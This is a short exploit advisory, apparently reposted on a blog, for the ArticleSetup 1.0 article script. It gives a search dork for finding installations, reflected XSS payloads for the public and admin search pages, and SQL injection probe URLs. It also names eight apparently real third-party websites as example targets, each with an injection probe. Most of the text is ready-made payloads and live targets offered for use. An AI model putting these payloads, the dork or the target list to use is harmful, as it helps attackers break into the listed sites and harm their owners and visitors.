#Exploit Title 		: ArticleSetup Multiple Vulnerabilities
#Author 		: DevilScreaM
#Date   		: 21/09/2013
#Category		: Web Applications 
#Vendor 		: http://www.articlesetup.com/
#Version 		: 1.0

#Dork 			
intext:Powered By Article Marketing

#Vulnerability  	: Cross Site Scripting , SQL Injection
#Tested On 		: Windows 7, Ubuntu (Mozila & Chrome)
#Greetz                 : Newbie-Security.or.id, Banjarmasin Hacker, Borneo Hacker


Cross Site Scripting

http://site-target/search.php?s=[XSS]

Example

http://www.freearticle.com.au/search.php?s=<script>alert('DevilScreaM')</script>


#XSS at Page Admin

http://site-target/admin/search.php?s=<script>alert('DevilScreaM')</script>


===================================================================================

SQL Injection Vulnerability

http://site-target/feed.php?cat=[SQL Injection]
http://site-target/search.php?s=[SQL Injection]

Example

http://www.freearticle.com.au/feed.php?cat=100'
http://www.freearticle.com.au/search.php?s=123'

====================================================================================

Example Target

http://freearticle.com.au/feed.php?cat=100'
http://alfithrah99.net/artikel/feed.php?cat=2'
http://demos1.softaculous.com/ArticleSetup/feed.php?cat=100'
http://oromodictionary.com/articles/feed.php?cat=1'
http://beingshoppers.com/article/feed.php?cat=44'
http://acheon.eu/article/feed.php?cat=54'
http://sitevena.com/feed.php?cat=12'
http://www.articleshub.in/feed.php?cat=10'
Rate this post
Брой прочитания на тази страница: 1179
ArticleSetup Multiple Vulnerabilities

Вашият коментар

Вашият имейл адрес няма да бъде публикуван. Задължителните полета са отбелязани с *